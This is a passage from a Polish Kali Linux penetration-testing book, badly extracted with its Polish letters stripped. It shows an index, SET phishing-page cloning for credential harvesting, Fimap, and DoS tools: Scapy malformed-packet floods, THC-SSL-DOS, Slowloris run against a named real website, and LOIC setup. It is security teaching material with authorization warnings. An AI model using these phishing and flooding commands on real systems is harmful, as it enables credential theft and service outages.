
DNS 71zadania 52zasoby serwisoacutew

spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54

rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia

zdarzenia 31rootkit 295rozsy anie spreparowanych

pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206

adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285

SSAM 171samdump2 178Scalpel 299

Scapy 257 259scenariusze atakoacutew 260

security assessment 21security audit 21serwery 91

aplikacji internetowych 92223zabezpieczanie 136 249

atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236

wykorzystanie 238Samba 116sieciowe 91WWW 262

serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71

serwisy spo eczno ciowe 58sesja 195

ciasteczka 197logowania 205mechanizmy bezpiecze stwa

195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249

adres IP sklonowanej witryny158

aplet Java 156Credential Harvester Attacks

157Exploit to deliver 154importowanie w asnych

plikoacutew witrynyinternetowej 158

IP addresshostname forreverse connection 154

mechanizmy chroni ceprzeprowadzany atak 155

NATPort forwarding 154przechwycenie nazw kont

i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych

wiadomo ci 159URL you want to clone 154

Kup książkę Poleć książkę

Skorowidz

335

uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku

z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery

biometryczne 194stron internetowych 246

skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u

ICMP 70Skipfish 95

raport 97s owniki 96

skryptyopakowuj ce 228wykrywanie

nieautoryzowanychskryptoacutew 287

XSS 224 226SLE 31Slowloris 261s owa kluczowe

dbs 222FUZZ 133 135tables 222

sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata

31sqlmap 221SSL stripping 140SSLstrip 140 197 211

konfigurowanieprzekierowania portoacutew 142

mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141

SSO 194

standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293

baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy

BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia

i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231

szablony witryn 251szare pude ko 24szyfrowane po czenia

https 197VPN 282

Ttablice t czowe 170 189

amanie hase systemuWindows 183

Tamper Data 125TCPReplay 270Tenable 163testowanie

dzia ania roacute nych urz dzesieciowych 270

mechanizmoacutew obronnych 273odporno ci na przeci enia

268podatno ci na ataki XSS 224sklonowanego rodowiska

279testy

o nieograniczonym zakresiedzia ania 26

odporno ci na przeci eniesystemu 256

warunkoacutew skrajnych 256

testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu

zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu

Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33

THX-SSL-DOS 257tokeny 194

sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259

Uumowy

oczekiwania klienta 317potencjalne problemy

i zagadnienia 324rozliczane wed ug zu ycia

czasu i zasoboacutew 305wykaz prac 319ze sta cen 304

unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi

NAT 251profesjonalne 304w chmurze 211

usuwanie ladoacutew w amania 38utrzymanie zdobytego

przyczoacute ka 37uwierzytelnianie 193

ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193

Kup książkę Poleć książkę

Skorowidz

336

VVega 101

modu serwera proxy 104zestawienie znalezionych

podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32

Ww3af 120

wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122

w3mir 281warto

ryzyka 32sumy kontrolnej 293zasobu 31

WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92

obs uga programu 93raport 95

WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132

Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171

ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie

plikoacutew 172partycja systemu 172uzyskanie dost pu do

systemu 180Windows Reverse_TCP

Meterpreter 154Wireless Attacks 47Wireshark 206

filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie

ciasteczek 198kodu 248

kodu SQL 218pakietoacutew 228skryptoacutew 223

wtyczki przegl darki Firefox 198wykaz prac

dodatkowe elementy 323dodatkowe uzgodnienia

prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania

i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy

penetracyjne 321wykorzystywanie

b doacutew w zabezpieczeniachprzegl darki 196

exploitoacutew 92luk w zabezpieczeniach 113

254systemoacutew poczty

elektronicznej 123zidentyfikowanych

podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie

luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92

wytyczne 28 304

XXSS 223

aplikacje internetowe 248testowanie podatno ci 224

XSS cookie stealing 225

Zzabezpieczanie

serweroacutew aplikacjiinternetowych 249

systemoacutew pod czonychdo internetu 271

zakres prac 319cel testu 33definicja

przestrzeni celoacutew 27systemoacutew 26

zdobycia flagi 28dokument 25identyfikacja obszaroacutew

krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o

planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby

prze amywaniazabezpiecze 27

rekomendacjepowykonawcze 28

specyfikacja raportuko cowego 28

ZAP 236 245obrona przed zdalnymi

atakami 249Zaproxy 105zarz dzanie

aktualizacjami 275poprawkami zabezpiecze

275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308

zasoby sieciowe odpornona przeci enie 263

zatarcie ladoacutew penetracji systemu38

zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125

Host details 81Zero-day 275zewn trzny dysk USB 292zmienne

LHOST 118RHOST 117

znaczniki czasu 172zrzut okna 327

daniaForm 131mapowanie 24

Kup książkę Poleć książkę

Page 29: Tytuł oryginału: Web Penetration Testing with Kali Linuxpdf.helion.pl/kalili/kalili.pdf · Uruchamianie systemu Kali Linux z no nika zewnÚtrznego 39 Instalowanie systemu Kali Linux

Kali Linux Testy penetracyjne

252

Kiedy zdefiniujesz adres IP pakiet SET poprosi Ci o wybranie szablonu W naszym przy-padku wybierzemy opcj Facebook

Na kolejnym rysunku przedstawiono okno przegl darki po czonej z serwerem o adresie127001 i wy wietlaj cej nasz fa szyw stron portalu Facebook Je eli wy wietlona stronanie wygl da przekonuj co mo esz u y innego szablonu albo po prostu sklonowa aktualnwersj danej strony

Zwroacute uwag e w pasku adresu przegl darki wy wietlany jest adres 127001 W wi kszo ciprzypadkoacutew b dziesz musia jednak u y nieco bardziej wyrafinowanych wektoroacutew atakuaby przekona u ytkownikoacutew do odwiedzenia Twojej spreparowanej strony internetowejMo esz to zrobi na wiele sposoboacutew na przyk ad poprzez rozsy anie do u ytkownikoacutew pocztelektroniczn specjalnie przygotowanej wiadomo ci zawieraj cej cze do Twojej spreparowanejwitryny internetowej (zobacz pierwszy rysunek na nast pnej stronie)

Kiedy u ytkownik rozpocznie wpisywanie nazwy konta i has a dost pu na naszej fa szywejstronie udaj cej witryn Facebook pakiet SET przechwyci ca y zwi zany z tym ruch sieciowyi nast pnie przekieruje u ytkownika do prawdziwej witryny internetowej Istnieje bardzo du-a szansa na to e po takim przekierowaniu u ytkownik b dzie przekonany e po prostu po-

myli si podczas wpisywania has a i zaloguje si jeszcze raz nie maj c wiadomo ci e bdquopodrodzerdquo pakiet SET przechwyci nazw jego konta i has o dost pu (zobacz drugi rysunek nanast pnej stronie)

Jak wida na powy szym rysunku pakiet SET przechwyci nazw naszego konta u ytkownikaDrChaos i nasze has o dost pu ILoveKali

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

253

Po zako czeniu tego wiczenia u yj kombinacji klawiszy Ctrl+C aby zako czy prac programuSET i wygenerowa raport w formacie HTML SET generuje profesjonalnie wygl daj cy ra-port ktoacuterego mo esz z powodzeniem u y podczas tworzenia raportu ko cowego z przepro-wadzonego testu penetracyjnego

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

254

Fimap

Fimap to narz dzie napisane w j zyku Python przeznaczone do wyszukiwania i wykorzysty-wania podatno ci i luk w zabezpieczeniach aplikacji internetowych pozwalaj cych na przeprowa-dzanie atakoacutew typu LFI (ang Local File Inclusion) lub RFI (ang Remote File Inclusion)

Aby uruchomi pakiet Fimap w systemie Kali Linux przejd do grupy Kali Linux a nast pniewybierz polecenie Web ApplicationsWeb Vulnerability Scannersfimap Po wybraniu tegopolecenia na ekranie pojawi si nowe okno terminala z wy wietlonym ekranem powitalnympolecenia fimap Dla pakietu fimap istnieje roacutewnie kilka dodatkowych wtyczek ktoacutere mo eszpobra z internetu i zainstalowa za pomoc nast puj cego polecenia

fimap --install -plugins

Dost pne wtyczki zostan wy wietlone w formie listy z opcj pozwalaj c na zainstalowaniewybranej wtyczki lub zako czenie dzia ania polecenia Jak wida w naszym przyk adzie do-st pne s dwie dodatkowe wtyczki st d polecenie instalowania musimy wykona dwukrotnieindywidualnie instaluj c poszczegoacutelne wtyczki (zobacz pierwszy rysunek na nast pnej stronie)

Aby u y pakietu Fimap musisz najpierw poda adres URL witryny ktoacutera b dzie celem skaneraIstnieje wiele metod definiowania adresoacutew URL Mo esz na przyk ad poda jeden wybrany adresURL ca list adresoacutew URL mo esz u y wyszukiwarki Google do zebrania adresoacutew URL

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

255

ale roacutewnie dobrze mo esz u y innych metod takich jak zbieranie wszystkich adresoacutew URLz hiper czy zamieszczonych na danej stronie internetowej czy pozyskiwanie adresoacutew URL z for-mularzy i nag oacutewkoacutew stron W naszym przypadku celem skanera b dzie witryna httpwwwthesecuritybloggercom

Aby uruchomi skanowanie witryny httpwwwthesecuritybloggercom powiniene wpisanast puj ce polecenie

fimap -u httpwwwthesecuritybloggercom

Pakiet Fimap rozpocznie skanowanie i sproacutebuje automatycznie wykry podatno ci na atakitypu LFIRFI Na rysunku przedstawionym poni ej wida jednak e witryna wwwthesecurity

bloggercom jest odporna na tego typu ataki

Ataki typu DoSW zdecydowanej wi kszo ci przypadkoacutew celem przeprowadzania testoacutew penetracyjnych jestidentyfikacja potencjalnych i rzeczywistych podatno ci i luk w zabezpieczeniach bez umy l-nego zak oacutecania dzia ania atakowanego systemu i bez robienia mu krzywdy w jakikolwiek in-ny sposoacuteb Jest to kluczowy element odroacute niaj cy autoryzowanego pentestera od z o liwegonapastnika maj cego niecne zamiary Prawdziwy napastnik nie przestrzega adnych regu

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

256

i nie zwraca uwagi na to czy jego dzia ania spowoduj zak oacutecenia w funkcjonowaniu atako-wanego systemu je eli tylko takie post powanie b dzie dla niego korzystne Czasami zdarzasi nawet e napastnik b dzie wr cz za wszelk cen szuka mo liwo ci zak oacutecenia dzia aniaczy nawet ca kowitego wy czenia atakowanego systemu Z tego powodu w niektoacuterych przypad-kach przeprowadzenie testoacutew odporno ci danej witryny czy aplikacji internetowej na ataki typuDoS (ang Denial of Service) mo e by bardzo po dane Testy tego rodzaju cz sto s nazywanetestami warunkoacutew skrajnych lub testami odporno ci na przeci enie systemu (ang stress testing)

Jedn z najwa niejszych spraw zwi zanych z testami odporno ci na ataki typu DoS jest bezwzgl dne uzyska-nie pisemnej zgody w a ciciela systemu na przeprowadzanie takich atakoacutew Niektoacutere metody atakoacutewmog mie negatywny wp yw na funkcjonowanie systemu nawet po zako czeniu testoacutew Dobrym roz-wi zaniem jest przeprowadzanie takich testoacutew na systemach z redundancj systemach nieprodukcyj-nych czy systemach zainstalowanych w rodowisku laboratoryjnym o ile to oczywi cie mo liwe

Najcz ciej spotykana metoda ataku DoS polega na bdquozalewaniurdquo badanego systemu masowonap ywaj cymi z zewn trz daniami Takie przeci enie zazwyczaj skutecznie uniemo liwiasystemowi odpowiadanie na rzeczywiste dania od autoryzowanych klientoacutew lub co najmniejtak spowalnia wysy anie odpowiedzi e ca y system staje si dla klientoacutew praktycznie bezu-yteczny Ataki typu DoS mog by skierowane na zasoby systemu (np przypisana przestrze

dyskowa przepustowo po cze sieciowych itd) konfiguracj systemu (np usuwanie tablicroutingu) informacje o stanie systemu (np resetowanie sesji TCP) oraz ka dy inny elementrodowiska systemu ktoacuterego przeci enie mo e spowodowa zak oacutecenie jego normalnego

funkcjonowania

Roacute nica pomi dzy atakami DoS (ang Denial of Service) a DDoS (ang Distributed Denial of Service) polega natym e do przeprowadzania ataku DoS napastnik wykorzystuje tylko jeden komputer podczas gdy w przy-padku atakoacutew DDoS liczba maszyn bior cych udzia w ataku mo e si ga tysi cy Omawianie zagadniezwi zanych z atakami DDoS wykracza niestety daleko poza ramy naszej ksi ki

Istniej cztery g oacutewne kategorie atakoacutew DoSDDoS Ataki wykorzystuj ce przeci enie po cze sieciowych (ang Volume Based

Attacks) mdash taki rodzaj ataku jest zwi zany z bdquozalewaniemrdquo atakowanego systemumasowo nap ywaj cymi pakietami UDP ICMP i innymi Celem takiego ataku jestprzeci enie po cze sieciowych atakowanego systemu nadmiernymi ilo ciamiprzesy anych pakietoacutew

Ataki na protoko y komunikacyjne (ang Protocol Attacks) mdash ataki te maj na celunadmierne wykorzystywanie zasoboacutew urz dze sieciowych takich jak routeryzapory sieciowe urz dzenia roacutewnowa ce obci enie po cze sieciowychPrzyk adami atakoacutew na protoko y komunikacyjne s ataki typu SYN floodPing of Death Smurf Teardrop wymuszanie fragmentacji pakietoacutew itp

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

257

Ataki na warstw aplikacji (ang Application Layer Attacks) mdash takie ataki wykorzystujnormalny ruch sieciowy do zak oacutecenia dzia ania lub nawet spowodowania awariidanej witryny lub aplikacji internetowej Przyk adami mog by ataki typu Zero-Dayczy ataki wykorzystuj ce inne podatno ci i luki w zabezpieczeniach witryn i aplikacjiinternetowych

Ataki powoduj ce wyczerpanie zasoboacutew sesji (ang Session Exhaustion) mdash takieataki powoduj wyczerpanie liczby dozwolonych jednocze nie sesji poprzez ci g enawi zywanie nowych po cze bez zamykania starych sesji co prowadzido wyczerpania zasoboacutew systemu

W systemie Kali Linux znajdziesz wiele narz dzi pozwalaj cych na wykorzystywanie podat-no ci i luk w zabezpieczeniach Narz dzia te na przyk ad Metasploit mog by u ywane doprzeprowadzania atakoacutew DoS na warstw aplikacji (wiele z tych narz dzi omawiali my ju wewcze niejszych rozdzia ach) W rozdziale 3 prezentowali my popularne narz dzie Scapypozwalaj ce na przeprowadzanie atakoacutew DoS na protoko y komunikacyjne Poni ej znaj-dziesz omoacutewienie kilku kolejnych narz dzi s u cych do przeprowadzania atakoacutew DoS ktoacuteremo esz znale w systemie Kali Linux

Aby przetestowa skuteczno ataku DoS mo esz u y witryny httpwwwupordownorg ktoacutera sprawdzadost pno podanej witryny internetowej

THX-SSL-DOSProtokoacute SSL (ang Secure Socket Layer) jest u ywany do nawi zywania bezpiecznych po -cze i transakcji w internecie Nawi zanie bezpiecznego po czenia z wykorzystaniem proto-ko u SSL wymaga u ycia po stronie serwera 15 razy wi kszej mocy obliczeniowej ni po stro-nie klienta Atak typu THC-SSL-DOS wykorzystuje t dysproporcj przez proacuteb prze adowaniaserwera spreparowanymi daniami nawi zania sesji SSL a do momentu kiedy przeci onyserwer si poddaje i przestaje odpowiada na dania przesy ane od innych autoryzowanychklientoacutew Atak wykorzystuje mechanizm renegocjacji bezpiecznego po czenia SSL do gene-rowania tysi cy takich da dla pojedynczego po czenia TCP Z tego powodu atak ten jestroacutewnie znany jako atak typu SSL-Exhaustion (ang mdash bdquowyczerpanie zasoboacutew SSLrdquo) Zalettakiego podej cia jest to e mo liwo ci przetwarzania da nawi zania sesji SSL s znaczniewy sze po stronie klienta co oznacza e przeci tny laptop pod czony do sieci za po red-nictwem cza o przeci tnej szybko ci mo e rzuci powa ne wyzwanie niemal ka demu serwero-wi aplikacji internetowych Podatno serweroacutew internetowych na ataki typu SSL-Exhaustionjest powszechnie znana a mimo to nie uda o si jeszcze opracowa skutecznej metody zapo-biegania takim atakom

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

258

Aby uruchomi pakiet THC-SSL-DOS w menu g oacutewnym systemu przejd do grupy Kali Linuxa nast pnie wybierz polecenie Stress TestingWeb Stress Testingthc-ssl-dos Po wybraniu pole-cenia pojawi si nowe okno terminala z ekranem powitalnym polecenia thc-ssl-dos Sk adniapolecenia jest nast puj ca

thc-ssl-dos [opcje] ltadres IP ofiarygt ltportgt and --accept

W wierszu wywo ania polecenia musisz umie ci opcj --accept w przeciwnym wypadku otrzymaszkomunikat o b dzie przedstawiony poni ej

Po uruchomieniu programu THC-SSL-DOS zobaczysz na ekranie kilka zabawnych komuni-katoacutew informuj cych e dzia anie programu si rozpocz o Na pierwszym rysunku zamiesz-czonym poni ej wida e zaatakowana witryna nie obs uguje protoko u SSL st d programwy wietla na ekranie komunikat o wyst pieniu b du Na kolejnym rysunku przedstawionosytuacj w ktoacuterej pomy lnie rozpocz si proces renegocjacji sesji SSL co w efekcie mo edoprowadzi do zak oacutecenia dzia ania atakowanego systemu Pami taj ataki tego typu mo eszprzeprowadza tylko na systemach dla ktoacuterych uzyska e pisemne zezwolenie w a cicielaPrzeprowadzenie takiego ataku mo e doprowadzi do powa nego ograniczenia funkcjonalno-ci atakowanego systemu lub nawet do jego ca kowitego za amania

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

259

ScapyJednym z najpopularniejszych narz dzi s u cych do przeprowadzania atakoacutew typu DoS jestScapy Program zosta napisany w j zyku Python a jego autorem jest Phillippe Biondi Scapypozwala na tworzenie modyfikowanie i dekodowanie zawarto ci pakietoacutew sieciowych wstrzyki-wanie pakietoacutew do sieci przechwytywanie pakietoacutew oraz dopasowywanie da i odpowiedziProgram posiada roacutewnie wiele innych mechanizmoacutew takich jak skanowanie portoacutew traso-wanie pakietoacutew sprawdzanie urz dze sieciowych przeprowadzanie atakoacutew czy wykrywanieurz dze sieciowych

Jedn z cz sto wykonywanych operacji jest przechwytywanie pakietoacutew TCP i wysy anie ichdalej do sieci za po rednictwem programu Scapy Aby uruchomi ten program w oknie ter-minala wpisz polecenie scapy Po uruchomieniu programu b dziesz moacuteg wykonywa pole-cenia bezpo rednio z jego wiersza polece

W przyk adzie ktoacutery przedstawiamy poni ej sproacutebujemy u y pakietu Scapy do wysy aniaspreparowanych pakietoacutew TCP do naszego serwera testowego W naszym przypadku serwertestowy ma adres IP 10001 ale w realnym scenariuszu mo e to by dowolny router czyserwer WWW Oproacutecz podania adresu atakowanego serwera musimy roacutewnie okre li liczbpakietoacutew ktoacutere zostan wys ane do celu W naszym przypadku b dzie to 2000 pakietoacutew cze-go mo emy dokona za pomoc nast puj cego polecenia

send(IP(dst=10001ttl=0)TCP()iface=eth0count=2000)

Powoduje ono wys anie 2000 pakietoacutew z interfejsu sieciowego eth0 do serwera o adresie10001 Jak zapewne zauwa y e czas ycia wysy anych pakietoacutew (parametr ttl) jest ustawio-ny na warto 0 Z punktu widzenia protoko u TCP istnienie takich pakietoacutew jest niemo liweInaczej moacutewi c wysy aj c pakiety z tak spreparowan warto ci parametru ttl proacutebujemywprowadzi atakowany serwer internetowy co najmniej w zak opotanie W realnym scenariu-szu potencjalny napastnik wysy a by do atakowanego serwera miliony takich pakietoacutew Wartozauwa y e w sprzyjaj cych okoliczno ciach zak oacutecenie pracy czy nawet powa na awaria serweramo e by spowodowana odebraniem nawet jednego niepoprawnego czy specjalnie z o liwiespreparowanego pakietu sieciowego Oczywi cie w zale no ci od zamiaroacutew mo esz dowolniemodyfikowa poszczegoacutelne opcje wysy ania pakietoacutew

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

260

Poni ej przedstawiamy kilkana cie popularnych scenariuszy atakoacutew przeprowadzanych przyu yciu pakietu Scapy

Nieprawid owa wersja protoko u IP

send(IP(dst=10001 src=10203040 version=0) TCP(dport=www) iface=eth0 count=2000)

Nieprawid owa suma kontrolna pakietu TCP

send(IP(dst=10001)TCP(chksum=0x5555)iface=eth0count=2000)

Nieprawid owe flagi pakietu TCP (wszystkie flagi wyzerowane i numer sekwencji usta-wiony na 0)

send(IP(dst=10001)TCP(flags=seq=555)iface=eth0 count=2000)

Nieprawid owe flagi pakietu TCP (wszystkie flagi ustawione jednocze nie)

send(IP(dst=10001)TCP(flags=0x0ff)iface=eth0count=2000)

Ustawiona tylko flaga FIN

send(IP(dst=10001)TCP(flags=F)iface=eth0count=2000)

Rozmiar nag oacutewka wi kszy od rozmiaru pakietu L2

send(IP(dst=10001 src=10203040 ihl=15L)TCP(dport=www) iface=eth0 count=2000)

Zbyt ma y rozmiar nag oacutewka pakietu

send(IP(dst=10001 src=10203040 ihl=2L)TCP(dport=www) iface=eth0 count=2000)

ICMP Flood

send(IP(dst=10001)ICMP()iface=eth0count=2000)

Nieprawid owa suma kontrolna pakietu IP

send(IP(dst=10001 src=10203040 chksum=0x5500) TCP(dport=www) iface=eth0 count=2000)

Fragmentacja pakietoacutew IP

send(IP(dst=10001 src=10203040 frag=1)TCP(dport=www) iface=eth0 count=2000)

Rozmiar pakietu IP wi kszy ni rozmiar pakietu warstwy L2

send(IP(dst=10001 src=10203040 ihl=5L len=80) TCP(dport=www) iface=eth0 count=2000)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

261

roacuted owy adres IP taki sam jak docelowy adres IP

send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)

Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)

Brak pakietu warstwy L4

send(IP(dst=10001 src=10203040) iface=eth0 count=2000)

Jednocze nie ustawione flagi SYN i FIN

send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)

Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2

send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)

Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)

send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)

Slowloris

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

262

Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym

programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco

czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera

Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne

Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris

Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej

perl slowlorispl

W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)

perl slowlorispl -dns thesecuritybloggercom

Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)

Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)

Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

263

LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

264

narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki

Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa

Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej

apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs

Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej

mkdir loic

Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej

wget httpsrawgithubcomnicolargoloicinstaller masterloicsh

Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie

chmod 777 loicsh

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

265

Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej

loicsh install

Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie

loicsh update

Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie

loicsh run

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

266

U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny

Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP

Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding

